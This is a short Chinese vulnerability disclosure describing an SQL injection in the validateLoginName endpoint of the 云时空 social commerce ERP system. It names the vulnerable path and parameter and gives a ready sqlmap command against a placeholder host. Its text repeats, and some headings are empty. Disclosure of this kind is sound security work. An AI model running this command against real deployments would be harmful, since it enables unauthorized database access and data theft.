云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞
漏洞描述
云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
漏洞影响
网络测绘
漏洞复现
登录页面
使用SQLmap验证漏洞
sqlmap -u "http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin"
云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
登录页面
使用SQLmap验证漏洞
sqlmap -u "http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin"